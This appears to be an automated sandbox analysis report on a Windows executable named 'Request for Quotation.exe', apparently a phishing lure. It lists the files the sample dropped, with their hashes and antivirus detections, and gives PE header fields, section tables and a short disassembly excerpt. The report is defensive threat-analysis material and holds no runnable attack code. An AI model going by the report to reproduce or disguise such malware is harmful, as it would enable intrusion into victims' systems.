                                      SHA-512:FB19A93FB5E44BD0313E89F375A87B9EEE000E889F37140350853C4526989C65D4404AFFEB6D35D2BB249602CEECAF33371AB2A968E3997E6C749A3F4CCD3DFB
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):289280
                                      Entropy (8bit):7.995655378638414
                                      Encrypted:true
                                      SSDEEP:6144:Hy4uUHLoooA6tLUmemiVZLBSLPDDIVtdbKPg53sy:HyMX6tLqTSHDIBB5V
                                      MD5:9B64BD4C4C4C1E2AF631B9D0785F0E31
                                      SHA1:DCC3811E3B2B85D3CC2857D94A04F7CD7A87479C
                                      SHA-256:AFEC7CAEEA82EE22D62B30C6A3EAC9375716BC03BF059C5C51603441B15B6765
                                      SHA-512:FB19A93FB5E44BD0313E89F375A87B9EEE000E889F37140350853C4526989C65D4404AFFEB6D35D2BB249602CEECAF33371AB2A968E3997E6C749A3F4CCD3DFB
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:OpenPGP Public Key
                                      Category:dropped
                                      Size (bytes):12320
                                      Entropy (8bit):7.986551112683112
                                      Encrypted:false
                                      SSDEEP:192:uX2rIUcyCzR05PwTKAax6ah0PZKp6Hl0PZWKBi6jHJhJNkxzifaFZw1xdBZdLKqc:S2rECYe3x6C0bHUWjqhJ2OfaT2dhd5G
                                      MD5:E1F19CDFFCDDB9BF326B3C7C6054648A
                                      SHA1:4E775967EEABFEE4DF8CEA7239DD0E84F22323C3
                                      SHA-256:218262C39AECCCC48784EEF71C0D9A70F8B73CFE8EA6EB17ED543D79F63327DA
                                      SHA-512:5D21C86A24ADED75CB9B5500681EE35DFCCE62754224B44AD9EA61D4E7D31B66B1A5F230A99E00443F168D32897E30B48B97986542CE28C4CC81DE26B742E91C
                                      Malicious:false
                                      Process:C:\Windows\System32\msdtc.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):2313
                                      Entropy (8bit):5.130169487900046
                                      Encrypted:false
                                      SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786p:Z070s0Y0q0mF7Dm5i
                                      MD5:36D92D36E350CFB120A1F587B579AA9B
                                      SHA1:F8FE97006F9CF5E4D4758742842C9D539244A699
                                      SHA-256:689D3879760B60EFBF0AD53261EF5649221E19477862C1610E8FA35D4BF3084F
                                      SHA-512:E486543DA8426EBD6821153F6AD56E32F2F0870DB7740B4792346DDD62A615A3EDB497993C3CD20DCA1893B8910EA4DBE848BCB53B17FDFBD191A43400D6D662
                                      Malicious:false
                                      Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1519616
                                      Entropy (8bit):4.020701478630795
                                      Encrypted:false
                                      SSDEEP:12288:EqV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ESVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:E14C66701387555047BA9BBD23773B82
                                      SHA1:F0BBF7F55117308569A83BDFEEC38C3A1A16BCB4
                                      SHA-256:9BAB90ECEBB3CFAF02DA27E4AD6353B3FBF5A97900D45648ACF040E3BB1B23FD
                                      SHA-512:1C3DF4E4673A50C742567084BE77E164DBA6042EF6132CCA12B083091D24692875CBBA20FAACFB4247F30EA16AFE3762972D74C4916670326FC8936839D8C417
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1348608
                                      Entropy (8bit):7.251564108576511
                                      Encrypted:false
                                      SSDEEP:24576:DQW4qoNUgslKNX0Ip0MgHCpoMBOuqVg9N9JMlDlfjRiVuVsWt5MJMs:DQW9BKNX0IPgiKMBOu2gFIDRRAubt5M
                                      MD5:5DD1E83A36E68A7B8F2D74514F9AFFA1
                                      SHA1:F490437DFAD377E433270ADBE52DB46ACBC3A2D7
                                      SHA-256:A05987935D0B94123C649DF69D4D7EAEF4F2A4BB232F77E20220B89CA6AE6DA3
                                      SHA-512:49B6C2017750384F1A7EF6BC659312C9CFC3404CCBBB97891C30F3774BFB3270B2DDC65CFFCF98627AD0801425EF39966E5FDC5E8D097CF215F093131BD54586
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1592832
                                      Entropy (8bit):4.174816590872804
                                      Encrypted:false
                                      SSDEEP:24576:S2G7AbHjkNVg9N9JMlDlfjRiVuVsWt5MJMs:S2G7AbHj4gFIDRRAubt5M
                                      MD5:17489634D24B10423079989B4964A3E7
                                      SHA1:D1C9C1E4F948908441E8B2E11069F527F42867F2
                                      SHA-256:069C92AEFA981274D38621427F5601B90388D428789C5FC3DDA03835BDC9B17D
                                      SHA-512:1E69700EC92B50C6157C234629D4CFDCBCB07D61D34BC585032184FDE34E61BA404057BDAD5ECA70C12BA568C42E6C623291400399D1A2F108F7673C2DFF97E5
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1242624
                                      Entropy (8bit):7.287678430785767
                                      Encrypted:false
                                      SSDEEP:24576:FkdpSI+K3S/GWei+qNv2wG3VVg9N9JMlDlfjRiVuVsWt5MJMs:F6SIGGWei2wG3vgFIDRRAubt5M
                                      MD5:4858CF6BC0503B39DCDAD51E994CDEF5
                                      SHA1:7A7F8F760458A43435E4F75A8389F3569FF85676
                                      SHA-256:7DA62D628717834A5ED7760FCA9184E06133F75EDC52E74A97D4CC505BB08943
                                      SHA-512:9618F7854BA9962622ADAAE72E739EA94B9B225AD81042349F12F2EB02C80D0E00D71958A5DC2411991B75A85826BE266166AC7EBEC232E368D01F1AF5737497
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1509888
                                      Entropy (8bit):3.9969791339781
                                      Encrypted:false
                                      SSDEEP:12288:c+V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:c+Vg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:0EA212771D99ED9B59C38AC619AF79B7
                                      SHA1:FD2B9E1B37ED13C75C3D6029913015EA55A06B36
                                      SHA-256:D49C6F4BF777A1EC5508B40AB438C2E7A6D1CD864DBE5B59D1878296058FE360
                                      SHA-512:1427D57403B925B15C89F60906785AE36E16B2B1F309F916D1DD327855777F59632D610B548F926F53EEF621F398484B8E2D7E860D403628FEA272F8CD66B78D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Windows\System32\msdtc.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):0.3212443768735157
                                      Encrypted:false
                                      SSDEEP:6:gLE9Xlt8ta/k/uMclF6vMclFq5zwqkH1z8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+t:rr80kqF69Fq5zIC6CzE5Z2+fqjFnt
                                      MD5:DE5878E5757F885DB757BF3446EFA032
                                      SHA1:269F1447D74CA93905114E0B78B96AFE8739AFB7
                                      SHA-256:16D662EA0CD8F304DDE84B4A8B0927D77F95A58914F47C79481BB3497B83D493
                                      SHA-512:978772A5450B17BF3FC8A5064179C1C3A8AD9658EEA69084871EA8165E82C5B4F1D7F917F500EC6AD7B052A6015B75B277B22BBD27A8A98C973966207AE871A9
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:modified
                                      Size (bytes):1880064
                                      Entropy (8bit):4.384276645606277
                                      Encrypted:false
                                      SSDEEP:24576:AdL3UTdVg9N9JMlDlfjRiVuVsWt5MJMs:AdL3UjgFIDRRAubt5M
                                      MD5:7765865BFBC2AA0361E0E3A618C590B8
                                      SHA1:B41A5E2E9CAD137A3C771E7A2991E6FC3A5B278E
                                      SHA-256:CDEBFE96155BFB4D893ED8EEC6F33988430CB3DB9A5272320A1BA6D57D55CE2D
                                      SHA-512:09F25932083A1C1F6223E6B34BCA75DE8B4C8E42E26A3C9C2BF146E65F11224AA3B32BB6AD4EF510553275264B8E515FF55FCF98CDB74B4186C27BBB358BB4D8
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1604608
                                      Entropy (8bit):4.198120609596529
                                      Encrypted:false
                                      SSDEEP:12288:HpFtyOzV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:wO5Vg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:65E45E0DE8536F3B14E886405F9D1C56
                                      SHA1:1B5DFFCA00D6CFD85445350149517BE467957CEB
                                      SHA-256:298FE01AD37474CC0DE60E6E03967290D684D746E9406C40C2C0221814A572D8
                                      SHA-512:E4726C7EAD567994AA53E86B554717ED5A8E237C915DA0E6D7E5768F70BE8DED79556B201E46402A4D321C1785281AB222B055FDA4EC7084C8CD2A39EE393C96
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1846784
                                      Entropy (8bit):6.937336792673284
                                      Encrypted:false
                                      SSDEEP:49152:aF2YuHNETovAvNYf8kmugFIDRRAubt5M:T6BCf8k0Uf
                                      MD5:B7946E1BA775337FEE4E6785A5E67187
                                      SHA1:7C830E1D73ABEDEFA90846D3B730AF3955693F71
                                      SHA-256:AE92B72A3FF48C51EED2FBCD6AE5FF41B5E3FE45E956B9063D054273EA0273B9
                                      SHA-512:66DF31B9D85E4FCA95729B4CCC97AAF6021793FA416CDA24B321234458567EF9E9F2274D2C83BC5D8EAC2417071639A7EADF5537122B9E5DFA0B6D90835642CF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1455616
                                      Entropy (8bit):7.236396669872163
                                      Encrypted:false
                                      SSDEEP:24576:iiW6ZvAKF5i/dN9Bdexj9Trk+F5Vg9N9JMlDlfjRiVuVsWt5MJMs:iYxF50b9Bdm9TxZgFIDRRAubt5M
                                      MD5:7708CE35FBFD8CB3DA18C4C0207016DB
                                      SHA1:CF8AE3EF739F33FB945EBB2A9912B53D74013BC4
                                      SHA-256:726908E72EE701EF083E4022D8A2413FB5055174259E64B03AB7CF47FE6A4005
                                      SHA-512:49331CE63837C64418FEF79FBA0D15E8BB325D4AC5C4837213E85EC33376720A7F6881A2BF1080A50D92017634963D14D97E3CE9EEBF4764958DA1B461844FF1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1594368
                                      Entropy (8bit):4.175676627135614
                                      Encrypted:false
                                      SSDEEP:12288:YEP3RF8V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:zFAVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:5814D242CD3F0A5096ACA78A36BA8FA8
                                      SHA1:B786DA5A5A22819FD65A08EF0C58412EB0972EC9
                                      SHA-256:D704E83758EF84148A78DE88FEDF1FC4F989B4D95D67ABF378DEE2E13D33D181
                                      SHA-512:DE11351414A51EC8FD20FDD3C313851F9B7FD0D359DA57CAC73C572DFC109D65EFCE1E7368F4BDACC43D125F656EA727F7060A0B64BBB1CE820C921EA4E02E28
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Windows\System32\AppVClient.exe
                                      File Type:COM executable for DOS
                                      Category:dropped
                                      Size (bytes):12320
                                      Entropy (8bit):7.986555673743732
                                      Encrypted:false
                                      SSDEEP:384:oDyvmP2WoA9SkWe4dVccV1m4PncJQVwd9BOu:oDyvgskWfVcczVnvV6nOu
                                      MD5:55AF6033F3C6DB799617B52755E7D5FF
                                      SHA1:79D83BB56DB9BC6C3338F4D7F83B446C2C68B4B6
                                      SHA-256:B55FF2D8D972B6A4BD3C181151541EB904B8510509B2568238C84DD446BAB3D1
                                      SHA-512:BA2CBB32038A48C0BD77130299AF4C07CC65B2ED05D7AD06F815FDA6E04CDC731B905694666DB0AB35719D32386C837103DD44943FE00BA6EF79F6EF5C79CAA7
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1647104
                                      Entropy (8bit):4.190900811453706
                                      Encrypted:false
                                      SSDEEP:12288:zjkyBV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:zIy7Vg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:D8FC46BD67F795631C6DAD07E33247EE
                                      SHA1:540824F4E828DF674DDA4F0A41993672EA7428AE
                                      SHA-256:D4B14354E3093A10584B7DD88D9F1B609F47A41207D641B0C24DB509B371F487
                                      SHA-512:92E39347E13BBF067EE0B0D47A1FF5B8E15170E0F454D9DBC2691461527D96509CE8CCAE3D592B709EAAB8C3DABFEF02D9E24F76EEEA225D63683F11F1A8529D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1568256
                                      Entropy (8bit):4.091828731826514
                                      Encrypted:false
                                      SSDEEP:12288:t40vV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:vdVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:0B3697CAF4A8FF717DE185B5754790C2
                                      SHA1:28BF993B178BB5B3A33A67B7A1F4F5CC831C1465
                                      SHA-256:E2FC7B11F9583B08E31F9C40EB34F2FEBAB37D65559A8AC9B2F315056A1402D1
                                      SHA-512:6D4A1FE0A9173E55972B66EFF662EF176F0FC9E41975689DCC760FC25640DECB61A9D9A001FA5ED2B342BE4716C36DDA997B7C9A97502842BFB7B4D02AD1B811
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1515520
                                      Entropy (8bit):4.009203929030421
                                      Encrypted:false
                                      SSDEEP:12288:gQDV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:XpVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:612475391C7276C2E25FF0A0CCAD3C66
                                      SHA1:4F6C19D2F23A2618421D8525A0C55DA11F1F4A8E
                                      SHA-256:3B8F2FF241F83EC75BA5A94712DD8E903F39E65C54E06EEBE4EC39B978E9A57F
                                      SHA-512:26B6BC0E55ABFE39665199D4111516F6F0F028893502CF3529CA06F560AE120C3B0C807EBED8E25E955E92CFC2222087C810F7388243F1B7483FFB801E7A4B3F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Windows\System32\Spectrum.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.1000713122762396
                                      Encrypted:false
                                      SSDEEP:6:QcvjK3l/k/uMclF6vMclFq5zwoNOn+SkUeYDwDzymMjzj:nvjKV/kqF69Fq5z1O+pawHymMjv
                                      MD5:82958F99952586DA6A04221602A75B2A
                                      SHA1:BF105118A3718D207AA7711E668864C71EF243DE
                                      SHA-256:D38E1F42AC58B41026CCDC15353E63C2108A37F9D9138EE3CFB77723BA982905
                                      SHA-512:828E569CBBD7DD599F0376111876B2E9D1F160776F84C31155C61FD41471FF4E83D7FF71F1263C14463716F092AF04B60F5E597169F4E44019EDA5B141741DE2
                                      Malicious:false
                                      Process:C:\Windows\System32\Spectrum.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.10165695162133843
                                      Encrypted:false
                                      SSDEEP:6:DfdsK3l/k/uMclF6vMclFq5zwYzVNMu3n+SkUeYDwDzyMvdszb:DfaKV/kqF69Fq5z1TX+pawHyuan
                                      MD5:7E2F6C222EE046BCA85FB41AD9524377
                                      SHA1:6281034A9B41ACCD8613D0AD629668378A212550
                                      SHA-256:EAF642D39E11E3E7D90BF749CD5C75CFEDED46CC3B2BC40E85B594E4189F7E73
                                      SHA-512:C73823769F3851461961103B71A68E17D3CB848CD0ACC1A09E565F45223227102D7288600782C99F9B5B3EE03D0C2E5BE85BB38567EF066B03BB2C80EB1FB02A
                                      Malicious:false
                                      Process:C:\Windows\System32\Spectrum.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.09913440271163
                                      Encrypted:false
                                      SSDEEP:6:ug7e/CK3Nk/uMclF6vMclFq5zweZNIn+SkUeYDwDzyb/Czr:u0e/CK9kqF69Fq5zfI+pawHyb/C3
                                      MD5:E658E8B8F111AE5D88E0855A5DFDAD09
                                      SHA1:FA900FBD486BB22C4F35F72BEE8D17E5A9A06AD1
                                      SHA-256:46FAA7181F760B02077815EB429D6D6A70D3EB3C1F15F61881161B3FE6917E7F
                                      SHA-512:53F3C0BE667B0A4D9CE79A592251ECD4E49015B3073DA305BF51CB11E25CC65A7F757830EF37FA1ED7122BDF7E750A71F8470FA7DAB547B6A1CAC43175CAF324
                                      Malicious:false
                                      Preview:....X...X.......................................X...!...................................>..j....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............2.U..K..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.........>..j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.5198307624537
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Request for Quotation.exe
                                      File size:1'795'584 bytes
                                      MD5:fe6fb05450b37478070255dcf0a11654
                                      SHA1:a6246b77f50e6abb2cde5bd9071c9e005974349b
                                      SHA256:34d8fc929f49899ffc738a5f19e97b9d1d2d6e63b26884af6ce803d9aed050bb
                                      SHA512:fa371c82aad27ef0f652a009c1d6137789058da6048fda2c2a23ddad7ddcdb3baecca71ee01b3ae3e281301b07bb6e2ab5fd77bde403424f5423964b30c00b37
                                      SSDEEP:49152:z20c++OCvkGs9FaTvHOSeXSCY2gFIDRRAubt5M:iB3vkJ987miUf
                                      TLSH:0C85E02273DDC361CB669173FF2AB7016E7B3C250630B95B2F940D79A960172262D7A3
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                      Icon Hash:aaf3e3e3938382a0
                                      Entrypoint:0x427dcd
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6756ACC8 [Mon Dec 9 08:39:36 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                      Instruction
                                      call 00007FDD047FC2DAh
                                      jmp 00007FDD047EF0A4h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push edi
                                      push esi
                                      mov esi, dword ptr [esp+10h]
                                      mov ecx, dword ptr [esp+14h]
                                      mov edi, dword ptr [esp+0Ch]
                                      mov eax, ecx
                                      mov edx, ecx
                                      add eax, esi
                                      cmp edi, esi
                                      jbe 00007FDD047EF22Ah
                                      cmp edi, eax
                                      jc 00007FDD047EF58Eh
                                      bt dword ptr [004C31FCh], 01h
                                      jnc 00007FDD047EF229h
                                      rep movsb
                                      jmp 00007FDD047EF53Ch
                                      cmp ecx, 00000080h
                                      jc 00007FDD047EF3F4h
                                      mov eax, edi
                                      xor eax, esi
                                      test eax, 0000000Fh
                                      jne 00007FDD047EF230h
                                      bt dword ptr [004BE324h], 01h
                                      jc 00007FDD047EF700h
                                      bt dword ptr [004C31FCh], 00000000h
                                      jnc 00007FDD047EF3CDh
                                      test edi, 00000003h
                                      jne 00007FDD047EF3DEh
                                      test esi, 00000003h
                                      jne 00007FDD047EF3BDh
                                      bt edi, 02h
                                      jnc 00007FDD047EF22Fh
                                      mov eax, dword ptr [esi]
                                      sub ecx, 04h
                                      lea esi, dword ptr [esi+04h]
                                      mov dword ptr [edi], eax
                                      lea edi, dword ptr [edi+04h]
                                      bt edi, 03h
                                      jnc 00007FDD047EF233h
                                      movq xmm1, qword ptr [esi]
                                      sub ecx, 08h
                                      lea esi, dword ptr [esi+08h]
                                      movq qword ptr [edi], xmm1
                                      lea edi, dword ptr [edi+08h]
                                      test esi, 00000007h
                                      je 00007FDD047EF285h
                                      bt esi, 03h
                                      jnc 00007FDD047EF2D8h
                                      Programming Language:
                                      • [ASM] VS2013 build 21005
                                      • [ C ] VS2013 build 21005
                                      • [C++] VS2013 build 21005
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ASM] VS2013 UPD4 build 31101
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5ffe8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | 3090a3327bcf1f126c5c7f9e4891301c | False | 0.5728679102422908 | data | 6.676131091367248 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5ffe8 | 0x60000 | e9a644d79666f608cdb10674b04ab1e0 | False | 0.9319737752278646 | data | 7.901823421147237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x96000 | 0x95000 | 3811808c359cc067cc6f855b0d8f11ad | False | 0.9757530673238255 | data | 7.938033508315599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
